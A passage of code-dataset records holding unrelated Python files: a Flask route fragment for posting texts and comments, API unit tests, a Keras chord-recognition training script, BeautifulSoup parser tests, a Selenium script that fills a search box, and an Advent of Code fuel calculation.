request.form.get(\"titulo\")\n\t\ttexto = request.form.get(\"texto\")\n\t\tcoautores = request.form.get(\"coautores\")\n\t\tdescricao = request.form.get(\"descricao\")\n\t\tautor = aul\n\n\t\tif titulo and texto and coautores and descricao and autor:\n\t\t\ti = Texto(titulo, texto, coautores, descricao, autor)\n\t\t\tdb.session.add(i)\n\t\t\tdb.session.commit()\n\t\t#return \"Novo texto publicado!!!\"\n\n\treturn redirect(url_for(\"publicado\"))\n\t\n@app.route(\"/publicado\")\ndef publicado():\n\treturn render_template(\"publicado.html\")\n\n@app.route(\"/timeline\")\ndef timeline():\n\ttexto = Texto.query.all()\n\t#idusuario = current_user.id\n\t#texto = Texto.query.filter_by(autor=idusuario)\n\treturn render_template('timeline.html', texto=texto)\n\n@app.route(\"/textoCompleto/<id>\", methods=['GET','POST'])\ndef textocompleto(id):\n\ttextt = Texto.query.get(id)\n\t#user = User.query.get(textt.autor)\n\n\ttitulo=textt.titulo\n\t#autores= \"autor: \" + user.username + \", coautores: \" + textt.coautores \n\tdescricao= textt.descricao\n\ttexto= textt.texto\n\n\tform = RegisterComentario()\n\tcomentario = Comentario.query.all()\n\t#comentario = Comentario.query.filter_by(post_id=id)\n\n\n\t#if form.validate_on_submit():\n\t\t#new_Comentario = Comentario( post_id=id, comentario=form.comentario.data )\n\t\t#db.session.add(new_Comentario)\n\t\t#db.session.commit()\n\t\t\n\n\tif request.method == \"POST\":\n\t\tpost_id = id\n\t\tcomentario = request.form.get(\"comentario\")\n\t\t\n\t\tif post_id and comentario :\n\t\t\tq = Comentario(post_id, comentario)\n\t\t\tdb.session.add(q)\n\t\t\tdb.session.commit()\n\t\t\treturn \"Comentário adicionado!\"\n\n\treturn render_template(\"textoCompleto.html\", titulo=titulo, texto=texto, descricao=descricao, id=id, form=form, comentario=comentario)\n\n\n\n\n\n\n\n","sub_path":"app/controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
{"seq_id":"279984630","text":"#!/usr/bin/python2\n# -*- coding: utf-8 -*-\n# @Author : Li ZiHao\n# @Time : 2019/9/19 11:35\n# @File : method_test.py\n\nimport time\nimport unittest\nfrom test_programe.interface.base.base_demo import RunMain\nimport random\nfrom HTMLTestRunner import HTMLTestRunner\n\n\n'''\nclass TestMethod(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        print(\"类执行之前会打印,且只打印一次\")\n\n    @classmethod\n    def tearDownClass(cls):\n        print(\"类执行后会打印,且只打印一次\")\n\n    def setUp(self):\n        print(\"每个case执行前都会执行一次\")\n\n    def tearDown(self):\n        print(\"每个case执行后都会执行一次\")\n\n    def test_01(self):\n        print('第一个case!!')\n\n    def test_02(self):\n        print('第二个case!!')\n'''\n\n\nclass TestMethod(unittest.TestCase):\n    username = ''\n    password = random.randint(1, 3)\n\n    def setUp(self):\n        self.run = RunMain()\n\n    def test_01(self):\n        url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n        data = {\n            'cart': '11'\n        }\n        res = self.run.run_main(url, 'POST', data)\n        self.assertEqual(res['data']['errorCode'], 1006)\n        globals()['code'] = res['code']\n        print(\"这是我的第一个case!!\")\n\n    # @unittest.skip('skip test_02 because cart is null')\n    def test_02(self):\n        url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n        data = {\n            'cart': ''\n        }\n        res = self.run.run_main(url, 'GET', data)\n        self.assertEqual(res['data']['errorCode'], 1006)\n        self.assertEqual(res['code'], code)\n        print(\"这是我的第二个case!!\")\n\n    @unittest.skipIf(username == '', 'skip test_03 if username is null ')\n    def test_03(self):\n        url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n        data = {\n            'cart': ''\n        }\n        res = self.run.run_main(url, 'GET', data)\n        self.assertEqual(res['data']['errorCode'], 1006)\n        print(\"这是我的第三个case!!\")\n\n    @unittest.skipUnless(password == 2, 'skip test_04 unless password == 2')\n    def test_04(self):\n        url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n        data = {\n            'cart': ''\n        }\n        res = self.run.run_main(url, 'GET', data)\n        self.assertEqual(res['data']['errorCode'], 1006)\n        print(\"这是我的第四个case!!\")\n\n    @unittest.expectedFailure\n    def test_05(self):\n        url = 'http://www.imooc.com/m/web/shizhanapi/loadmorepingjia.html'\n        data = {\n            'cart': '11'\n        }\n        res = self.run.run_main(url, 'POST', data)\n        self.assertEqual(res['code'], 300)\n        print('这是我的第五个case')\n\n\nif __name__ == '__main__':\n    test_dir = './'\n    discover = unittest.defaultTestLoader.discover(\n        test_dir,\n        pattern='*_test.py'\n    )\n    now_time = time.strftime('%Y-%m-%d %H_%M_%S')\n    report_file = '../report/' + now_time + '_report.html'\n    with open(report_file, 'wb') as fp:\n        runner = HTMLTestRunner(\n            stream=fp,\n            title='TestMethod Report',\n            description='This is a test report哈哈'\n        )\n        runner.run(discover)\n\n\n\n\n","sub_path":"test_programe/interface/case/method_test.py","file_name":"method_test.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
{"seq_id":"82479166","text":"''' Libraries '''\nimport os\nimport sys\nimport time\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping\n\nfrom score import get_sevenths_score\nfrom mapping import mapping_dict, short_mapping_dict\n\n\n''' Parameters '''\nRANDOM_SEED = 2\n\n\n''' Global variables'''\ndebug_mode = False\nif debug_mode:\n    data_directory = 'CE200_sample'\n    file_amount = 20\nelse:\n    data_directory = 'CE200'\n    file_amount = 200\n\ndata_divide_amount = 1\nsec_per_frame = 512.0 / 22050.0 / data_divide_amount\n\nframes_per_data = data_divide_amount * 11\nframes_on_one_side = int((frames_per_data - 1) / 2)\n\nepochs = 30000\nbatch_size = 87075\n\nload_exist_model = False\nload_model_path = 'model/2020-10-28/20.57.14'\n\ndisplay_figure = False\n\nauto_save_path = True\nif auto_save_path:\n    now = time.localtime()\n    now_date = time.strftime('%Y-%m-%d', now)\n    now_time = time.strftime('%H.%M.%S', now)\n    save_directory = f'model/{now_date}/{now_time}'\nelse:\n    save_directory = ''\n\noutput_answer = True\n\n\n''' Codes '''\ndef adjust_model(model):\n    model.add(Dense(400, input_shape=(264, ), activation='relu'))\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 1\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 2\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 3\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 4\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 5\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 6\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 7\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 8\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 9\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 10\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 11\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 12\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 13\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 14\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 15\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 16\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 17\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 18\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 19\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 20\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 21\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 22\n    model.add(Dense(400, input_shape=(400, ), activation='sigmoid'))  # 23\n    model.add(Dense(400, input_shape=(400, ), activation='relu'))  # 24\n    model.add(Dense(544, input_shape=(400, ), activation='softmax'))\n    model.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n    return model\n\n\ndef processData(train_file_index):\n    ''' Dataset '''\n    X = []\n    X_train = []\n    X_validation = []\n    Y = []\n    Y_train = []\n    Y_validation = []\n\n    error_list = []\n\n    toolbar_width = 100\n    sys.stdout.write(\"\\\nReading train & validation data from each song in '%s'.\\\n[%s]\" % (data_directory, \" \" * toolbar_width))\n    sys.stdout.flush()\n    sys.stdout.write(\"\\\b\" * (toolbar_width+1))\n\n    for song_index in range(file_amount):\n\n        if data_divide_amount == 1: read_csv_file_path = f'{data_directory}/{song_index+1}/data.csv'\n        else: read_csv_file_path = f'{data_directory}/{song_index+1}/data_divide_{data_divide_amount}.csv'\n\n        data = pd.read_csv(read_csv_file_path, index_col=0)\n\n        data['label'] = data['label'].map(mapping_dict)\n        # for index, label in enumerate(data['label']):\n        #     if label in short_mapping_dict.keys(): data['label'][index] = short_mapping_dict[label]\n        #     else: data['label'][index] = short_mapping_dict['Other']\n\n        data = data.values\n\n        label_index = data.shape[1]-1\n        data_index = np.arange(len(data))\n        np.random.shuffle(data_index)\n        data_index = data_index[:int(len(data_index) * 1)]\n        data = np.vstack((np.zeros((frames_on_one_side, 25)), data, np.zeros((frames_on_one_side, 25))))\n\n        for index, shuffle_index in enumerate(data_index):\n            try:\n                label = int(data[index+frames_on_one_side, label_index])\n                shuffle_label = int(data[shuffle_index+frames_on_one_side, label_index])\n                X.append(data[index:index+frames_per_data, 0:label_index].reshape(label_index*frames_per_data))\n                Y.append(label)\n                if song_index in train_file_index:\n                    X_train.append(data[shuffle_index:shuffle_index+frames_per_data, 0:label_index].reshape(label_index*frames_per_data))\n                    Y_train.append(shuffle_label)\n                else:\n                    X_validation.append(data[shuffle_index:shuffle_index+frames_per_data, 0:label_index].reshape(label_index*frames_per_data))\n                    Y_validation.append(shuffle_label)\n            except:\n                error_list.append({\n                    'index': index+frames_on_one_side,\n                    'label string': data[index+frames_on_one_side, label_index],\n                    'shuffle_index': shuffle_index+frames_on_one_side,\n                    'shuffle_label string': data[shuffle_index+frames_on_one_side, label_index]\n                })\n                continue\n\n        if debug_mode:\n            sys.stdout.write(\"=\" * 5)\n            sys.stdout.flush()\n        elif (song_index + 1) % (file_amount / toolbar_width) == 0:\n            sys.stdout.write(\"=\")\n            sys.stdout.flush()\n\n    sys.stdout.write(\"]\\\n\\\n\")\n\n    X = np.array(X)\n    X_train = np.array(X_train)\n    X_validation = np.array(X_validation)\n    Y = to_categorical(Y, num_classes=len(mapping_dict))\n    Y_train = to_categorical(Y_train, num_classes=len(mapping_dict))\n    Y_validation = to_categorical(Y_validation, num_classes=len(mapping_dict))\n\n    print('Error amount: ', len(error_list))\n    print(f'Train data: {int(len(X_train)):7d} / All data: {len(X):7d}\\\n')\n    time.sleep(3)\n\n    return (X, Y), (X_train, Y_train), (X_validation, Y_validation)\n\n\ndef compare_figure(history):\n\n    import matplotlib.pyplot as plt\n\n    loss = history.history['loss']\n    accuracy = history.history['accuracy']\n    validation_loss = history.history['val_loss']\n    validation_accuracy = history.history['val_accuracy']\n    epochs_length = range(1, len(loss)+1)\n\n    fig, axs = plt.subplots(2)\n    fig.set_size_inches(12, 16)  # 3:4\n    fig.suptitle('Training & Validation Comparition')\n    # plt.title('Training & Validation Loss')\n    # plt.xlabel('Epochs')\n    # plt.ylabel('Loss')\n    axs[0].plot(epochs_length, loss, \"b-\", label='Training Loss')\n    axs[0].plot(epochs_length, validation_loss, \"r-\", label='Validation Loss')\n    axs[1].plot(epochs_length, accuracy, \"b-\", label='Training Accuracy')\n    axs[1].plot(epochs_length, validation_accuracy, \"r-\", label='Validation Accuracy')\n    axs[0].legend()\n    axs[1].legend()\n\n    plt.savefig(f'{save_directory}/figure.png', dpi=200)\n    if display_figure: plt.show()\n\n    return\n\n\ndef estimate_and_write_to_file(model):\n\n    toolbar_width = 100\n    sys.stdout.write(f\"\\\nEstimating and writing to '{data_directory}/xxx/est_file.txt'.\\\n[%s]\" % (\" \" * toolbar_width))\n    sys.stdout.flush()\n    sys.stdout.write(\"\\\b\" * (toolbar_width+1))\n\n    for song_index in range(file_amount):\n\n        if data_divide_amount == 1: read_csv_file_path = f'{data_directory}/{song_index+1}/data.csv'\n        else: read_csv_file_path = f'{data_directory}/{song_index+1}/data_divide_{data_divide_amount}.csv'\n\n        data = pd.read_csv(read_csv_file_path, index_col=0)\n        data['label'] = data['label'].map(mapping_dict)\n        data = data.values\n\n        label_index = data.shape[1]\n        original_data_length = len(data)\n        data = np.vstack((np.zeros((frames_on_one_side, label_index)), data, np.zeros((frames_on_one_side, label_index))))\n\n        X = []\n        for i in range(original_data_length):\n            X.append(data[i:i+frames_per_data, 0:label_index-1].reshape((label_index-1)*frames_per_data))\n\n        X = np.array(X)\n        Y_pred = model.predict_classes(X)\n        with open(f'{data_directory}/{song_index+1}/est_file.txt', mode='w') as f:\n            index_now = 0\n            index_last = 0\n            while index_now < len(Y_pred):\n                if (index_now == len(Y_pred) - 1) or (Y_pred[index_now] != Y_pred[index_now+1]):\n                    for k, v in mapping_dict.items():\n                        if v == Y_pred[index_now]:\n                            f.write(f'{sec_per_frame*index_last:.06f}\\\t{sec_per_frame*(index_now+1):.06f}\\\t{k}\\\n')\n                            index_last = index_now + 1\n                            break\n                index_now += 1\n\n        if debug_mode:\n            sys.stdout.write(\"=\" * 5)\n            sys.stdout.flush()\n        elif (song_index + 1) % (file_amount / toolbar_width) == 0:\n            sys.stdout.write(\"=\")\n            sys.stdout.flush()\n\n    sys.stdout.write(\"]\\\n\\\n\")\n    return\n\n\ndef record_details(cost_time, validation_loss, validation_accuracy, original_loss, original_accuracy, model_scores):\n    print(f\"\\\nRecording details... \", end='')\n    with open(f'{save_directory}/details.txt', mode='w') as f:\n        f.write(f'RANDOM_SEED = {RANDOM_SEED}\\\n')\n        f.write(f'\\\n')\n        f.write(f'data_divide_amount = {data_divide_amount}\\\n')\n        f.write(f'frames_per_data = {frames_per_data}\\\n')\n        f.write(f'\\\n')\n        f.write(f'epochs = {epochs}\\\n')\n        f.write(f'batch_size = {batch_size}\\\n')\n        f.write(f'\\\n')\n        f.write(f'cost_time: {cost_time}\\\n')\n        f.write(f'validation_loss: {validation_loss}\\\n')\n        f.write(f'validation_accuracy: {validation_accuracy}\\\n')\n        f.write(f'original_loss (all data): {original_loss}\\\n')\n        f.write(f'original_accuracy (all data): {original_accuracy}\\\n')\n        f.write(f'\\\n')\n        for model_name, model_score in model_scores.items():\n            f.write(f\"Score by '{model_name}' model: {model_score}\\\n\")\n    print('Done.')\n    return\n\n\ndef main():\n\n    np.random.seed(RANDOM_SEED)\n    file_index = np.arange(file_amount)\n    np.random.shuffle(file_index)\n    train_file_index = file_index[:int(file_amount * 0.4)]\n    validation_file_index = file_index[int(file_amount * 0.4):]\n\n    ''' Model '''\n    model = Sequential()\n    if load_exist_model:\n\n        model_dict = {\n            'last': 'model.h5',\n            'min val_loss': 'best_model_min_val_loss.h5',\n            'max val_accuracy': 'best_model_max_val_accuracy.h5',\n        }\n\n        for model_name, file_name in model_dict.items():\n\n            model = load_model(f'{load_model_path}/{file_name}')\n            # (X, Y), (X_train, Y_train), (X_validation, Y_validation) = processData(train_file_index)\n            # loss, accuracy = model.evaluate(X, Y)\n            # print(f'\\\nEvaluate with original data (all) - Loss: {loss}, Accuracy: {accuracy * 100:.3f}%')\n            estimate_and_write_to_file(model)\n\n            total_score = 0\n            train_score = 0\n            validation_score = 0\n\n            for song_index in file_index:\n                ref_file_path = f'{data_directory}/{song_index+1}/ground_truth.txt'\n                est_file = f'{data_directory}/{song_index+1}/est_file.txt'\n                score = get_sevenths_score(ref_file=ref_file_path, est_file=est_file)\n                total_score += score\n                if song_index in train_file_index: train_score += score\n                else: validation_score += score\n\n            total_score /= file_amount\n            train_score /= len(train_file_index)\n            validation_score /= len(validation_file_index)\n\n            print(f\"\\\nTotal average score by '{model_name}': {total_score}\")\n            print(f\"Train average score by '{model_name}': {train_score}\")\n            print(f\"Validation average score by '{model_name}': {validation_score}\")\n\n    else:\n\n        (X, Y), (X_train, Y_train), (X_validation, Y_validation) = processData(train_file_index)\n\n        model = adjust_model(model)\n        os.system('cls')\n\n        if not os.path.exists(save_directory):\n            os.makedirs(save_directory)\n        last_model_path = f'{save_directory}/model.h5'\n        best_model_min_val_loss_path = f'{save_directory}/best_model_min_val_loss.h5'\n        best_model_max_val_accuracy_path = f'{save_directory}/best_model_max_val_accuracy.h5'\n\n        rename_save_directory = save_directory\n        start_time = datetime.datetime.now()  # Set timer\n\n        MCP_min_val_loss = ModelCheckpoint(\n            best_model_min_val_loss_path,\n            monitor='val_loss', mode='min', verbose=1, save_best_only=True\n        )\n        MCP_max_val_acc = ModelCheckpoint(\n            best_model_max_val_accuracy_path,\n            monitor='val_accuracy', mode='max', verbose=1, save_best_only=True\n        )\n        ES = EarlyStopping(\n            monitor='loss', mode='min',\n            verbose=1, patience=50\n        )\n        history = model.fit(\n            X_train, Y_train,\n            # validation_split=validation_split,\n            validation_data=(X_validation, Y_validation),\n            epochs=epochs, batch_size=batch_size,\n            callbacks=[MCP_min_val_loss, MCP_max_val_acc, ES]\n        )\n\n        end_time = datetime.datetime.now()\n        cost_time = str(end_time-start_time)\n\n        print(f'\\\nLearning cost time: {cost_time}\\\n')\n        validation_loss, validation_accuracy = model.evaluate(X_validation, Y_validation)\n        print(f'Evaluate with validation data - Loss: {validation_loss}, Accuracy: {validation_accuracy * 100:.2f}%\\\n')\n        original_loss, original_accuracy = model.evaluate(X, Y)\n        print(f'Evaluate with original data (all) - Loss: {original_loss}, Accuracy: {original_accuracy * 100:.2f}%')\n\n        ''' Save figure & model '''\n        if data_divide_amount == 1: rename_save_directory = f'{rename_save_directory}-MF-{original_accuracy * 100:.2f}%'\n        else: rename_save_directory = f'{rename_save_directory}-DMF-{original_accuracy * 100:.2f}%'\n\n        compare_figure(history)\n        model.save(last_model_path)\n\n        if output_answer:\n            model_paths = {\n                'last': last_model_path,\n                'min val_loss': best_model_min_val_loss_path,\n                'max val_accuracy': best_model_max_val_accuracy_path,\n            }\n            model_scores = {}\n            best_score = 0\n            score = 0\n            for model_name, model_path in model_paths.items():\n                model = Sequential()\n                model = load_model(model_path)\n                estimate_and_write_to_file(model)\n                for song_index in validation_file_index:\n                    ref_file_path = f'{data_directory}/{song_index+1}/ground_truth.txt'\n                    est_file = f'{data_directory}/{song_index+1}/est_file.txt'\n                    score += get_sevenths_score(ref_file=ref_file_path, est_file=est_file)\n                score /= len(validation_file_index)\n                model_scores[model_name] = score\n                if score > best_score: best_score = score\n                print(f\"\\\nAverage validation score by '{model_name}' model: {score}\")\n            rename_save_directory = f'{rename_save_directory}-{best_score * 100:.5f}'\n\n            record_details(cost_time, validation_loss, validation_accuracy, original_loss, original_accuracy, model_scores)\n\n        os.rename(save_directory, rename_save_directory)\n\n\nif __name__ == \"__main__\":\n    os.system('cls')\n    main()","sub_path":"phase1_competition/other models/splitDataModel.py","file_name":"splitDataModel.py","file_ext":"py","file_size_in_byte":16165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
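A small sketch of the padded sliding-window framing that processData() builds in the record above: each training sample is the frames_per_data rows centered on a frame, with zero padding at both ends so edge frames get full windows. The array sizes below are made up.

import numpy as np

frames_per_data = 11
side = (frames_per_data - 1) // 2           # frames_on_one_side
data = np.random.rand(100, 24)              # 100 frames, 24 features each
padded = np.vstack([np.zeros((side, 24)), data, np.zeros((side, 24))])

# the window for original frame i spans padded[i : i + frames_per_data]
i = 0
window = padded[i:i + frames_per_data].reshape(frames_per_data * 24)
print(window.shape)  # (264,), matching the model's Dense input_shape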
{"seq_id":"621119806","text":"#!/usr/bin/env python3\n\nimport unittest\nfrom bs4 import BeautifulSoup as BSoup\nfrom brings.parser import SoupParser\nfrom brings.scraper import read_sites_config\n\n\nclass TestParser(unittest.TestCase):\n    def setUp(self):\n        site = \"\"\n        with open('local/testsite.html', 'r') as fh:\n            site = fh.read()\n        self.parser = SoupParser(BSoup(site, 'html5lib'))\n\n        broken_site = \"\"\n        with open('local/testsite_broken.html', 'r') as fh:\n            broken_site = fh.read()\n        self.broken_parser = SoupParser(BSoup(broken_site, 'html5lib'))\n\n        self.parser.filter_region(('div', {\"id\":\"main\"}))\n        self.parser.set_section(('article', {}))\n\n        self.broken_parser.filter_region(('div', {\"id\":\"main\"}))\n        self.broken_parser.set_section(('article',{}))\n\n    def test_must_have(self):\n        site = \"\"\n        with open ('local/lgs.xml', 'r') as fh:\n            site = fh.read()\n        parser = SoupParser(BSoup(site, 'xml'))\n        parser.set_section(('item',))\n        parser.must_have_tag(('rsslink',))\n        parser.require_tag_content('title', ('title',))\n        parser.parse()\n        self.assertEqual(10, len(parser.parsed_data))\n\n    def test_must_have_in_seiten_xml(self):\n        site = \"\"\n        with open ('database/seiten.xml', 'r') as fh:\n            site = fh.read()\n        parser = SoupParser(BSoup(site, 'xml'))\n        parser.set_section(('source', {'name':'Landesverband'}))\n        parser.must_have_tag(('scraper_id',), content=\"lgs_pm\")\n        parser.require_section_attribute('name', 'name')\n        parser.require_tag_content('locale_string', ('locale', {}))\n        parser.parse()\n        self.assertEqual(1, len(parser.parsed_data))\n        self.assertEqual('Landesverband', parser.parsed_data[0]['name'])\n\n    def test_want_tag_content(self):\n        parser = self.parser\n        parser.want_tag_content(\n            'title',\n            ('div', {'class':'entry-title'}),\n            'no-title'\n        )\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual('Testtitle', parser.parsed_data[0]['title'])\n\n    def test_want_tag_content_parent(self):\n        parser = self.parser\n        parser.want_tag_content(\n            'title',\n            ('div', {'class':'entry-title'}),\n            'no-title',\n            ('header', {'class':'article-header'})\n        )\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual('Testtitle', parser.parsed_data[0]['title'])\n\n    def test_want_tag_content_default(self):\n        \"\"\"Try to fetch content from a non-existing tag and check for\n        default value.\n        \"\"\"\n        parser = self.parser\n        parser.want_tag_content(\n            'title',\n            ('div', {'class':'title'}),\n            'no-title'\n        )\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        for article in parser.parsed_data:\n            self.assertEqual('no-title', article['title'])\n\n    def test_want_attribute_parent(self):\n        parser = self.parser\n        parser.want_attribute(\n            'img_sizes',\n            ('img',{'class':'attachment-antwortzeit-thumb-240'}),\n            'sizes',\n            '0x0',\n            ('div', {'class':'bild'})\n        )\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual('(max-width: 240px) 100vw, 240px',\n                         parser.parsed_data[0]['img_sizes'])\n\n    def test_want_attribute_wo_parent(self):\n        \"\"\"Fetch the value of an attribute, without filtering through\n        a parent tag. This only takes effect in the test-article.\n        \"\"\"\n        parser = self.parser\n        parser.want_attribute(\n            'img_sizes',\n            ('img',{'class':'attachment-antwortzeit-thumb-240'}),\n            'sizes',\n            '0x0',\n        )\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual('test_size',\n                         parser.parsed_data[0]['img_sizes'])\n        self.assertEqual('(max-width: 240px) 100vw, 240px',\n                         parser.parsed_data[1]['img_sizes'])\n\n    def test_want_section_attribute(self):\n        parser = self.parser\n        parser.want_section_attribute('post-id', 'id', 'no-id')\n        parser.parse()\n        self.assertEqual(parser.parsed_data[0]['post-id'], 'post-0815')\n\n    def test_require_tag_content(self):\n        parser = self.parser\n        parser.require_tag_content(\n            'title',\n            ('div', {'class':'entry-title'}),\n        )\n        self.assertEqual(1, len(parser.required_rules))\n        self.assertEqual('title', parser.required_rules[0][1])\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual('Testtitle', parser.parsed_data[0]['title'])\n\n    def test_require_attribute(self):\n        parser = self.parser\n        parser.require_attribute('url', ('a',), 'href')\n        self.assertEqual(1, len(parser.required_rules))\n        self.assertEqual('url', parser.required_rules[0][1])\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual(\n            'https://test-article.de',\n            parser.parsed_data[0]['url']\n        )\n\n    def test_require_tag_broken(self):\n        parser = self.broken_parser\n        parser.require_tag_content(\n            'title',\n            ('div', {'class':'entry-title'}),\n        )\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n\n    def test_require_attribute_broken(self):\n        parser = self.broken_parser\n        parser.require_attribute('url', ('a', ), 'href')\n        parser.want_tag_content('pub_time', ('div', {'class':'meta time'}), \"heute\")\n        parser.parse()\n        self.assertEqual(2, len(parser.parsed_data[0]))\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual('heute', parser.parsed_data[0]['pub_time'])\n\n    def test_parse_a_real_set(self):\n        parser = self.parser\n        parser.require_tag_content('title', ('div', {'class':'entry-title'}))\n        parser.require_attribute('url', ('a', {'class':'nolinkstyle'}), 'href')\n        parser.want_tag_content('pub_time', ('div', {'class':'meta time'}, \"heute\"))\n        parser.want_attribute('link_title', ('a', {'class':'nolinkstyle'}), 'title', \"---\")\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual(4, len(parser.parsed_data[0]))\n        self.assertEqual('Testtitle', parser.parsed_data[0]['title'])\n        self.assertEqual('https://test-article.de', parser.parsed_data[0]['url'])\n        self.assertEqual('01. Januar 1970', parser.parsed_data[0]['pub_time'])\n\n    def test_want_regex(self):\n        import re\n        parser = self.parser\n        parser.want_regex(\n            'monat',\n            ('header', {'class':'article-header'}),\n            re.compile('oktober', re.I),\n            'nicht im oktober publiziert')\n        parser.require_tag_content(\n            'title',\n            ('div', {'class':'entry-title'})\n        )\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        self.assertEqual('11. Oktober 2019', parser.parsed_data[1]['monat'])\n        self.assertEqual('nicht im oktober publiziert', parser.parsed_data[4]['monat'])\n\n    def test_add_transform_func(self):\n        def transformfunc(infos, article):\n            article['title'] = \"We are all the same.\"\n        parser = self.parser\n        parser.add_transform_func(transformfunc)\n        parser.require_tag_content(\n            'title',\n            ('div', {'class':'entry-title'})\n        )\n        parser.parse()\n        for article in parser.parsed_data:\n            self.assertEqual('We are all the same.', article['title'])\n\n    def test_multiple_calls_to_parse(self):\n        parser = self.parser\n        parser.require_tag_content(\n            'title',\n            ('div', {'class':'entry-title'})\n        )\n        parser.parse()\n        self.assertEqual(11, len(parser.parsed_data))\n        parser.require_tag_content(\n            'title',\n            ('div', {'class':'wrong-class'})\n        )\n        parser.parse()\n        self.assertEqual(0, len(parser.parsed_data))\n\n    def tearDown(self):\n        pass\n\n    def _show_parser(self, parser_type=\"good\"):\n        if parser_type == \"broken\":\n            parser = self.broken_parser\n        else:\n            parser = self.parser\n        for item in parser.parsed_data:\n            print (item)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
{"seq_id":"32788226","text":"# coding=utf-8\nfrom selenium import webdriver\n\n# Use JavaScript to operate on page elements\ndriver = webdriver.Chrome()\ndriver.maximize_window()\ndriver.get(\"https://www.baidu.com\")\nprint(f'current url is {driver.current_url}')\nprint(f'window handle is {driver.current_window_handle}')\njs = \"document.getElementById('kw').value = 'selenium'\"  # this command can also be run in the browser console\ndriver.execute_script(js)\nimport time\ntime.sleep(2)\ndriver.quit()\n","sub_path":"Python3_Selenium3/第6章/6.28_js.py","file_name":"6.28_js.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
{"seq_id":"367342876","text":"#part 1\n# with open (\"D1_input.txt\", 'r') as file: \n#     sum = 0\n#     for line in file: \n#         value = line.rstrip('\\\n')\n#         value = int(value) \n#         value = (value//3 - 2)\n#         sum += value\n#     print (sum)\n\n#part 2 \nwith open (\"D1_input.txt\", 'r') as file: \n    sum = 0\n    for line in file: \n        value = line.rstrip('\\\n')\n        value = int(value) \n        valueSum = 0\n        fuel = value\n        while fuel > 5:\n            fuel = fuel // 3 - 2\n            valueSum += fuel\n        sum += valueSum\n    print (sum)\n","sub_path":"D1.py","file_name":"D1.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
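The loop in the D1 record above keeps subtracting fuel-for-fuel until the contribution drops to zero. The same computation can be written recursively; this sketch is an equivalent reformulation, not the record's own code:

def total_fuel(mass):
    # fuel for this mass; negative or zero contributions terminate the recursion
    fuel = mass // 3 - 2
    if fuel <= 0:
        return 0
    return fuel + total_fuel(fuel)

print(total_fuel(1969))    # 966
print(total_fuel(100756))  # 50346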
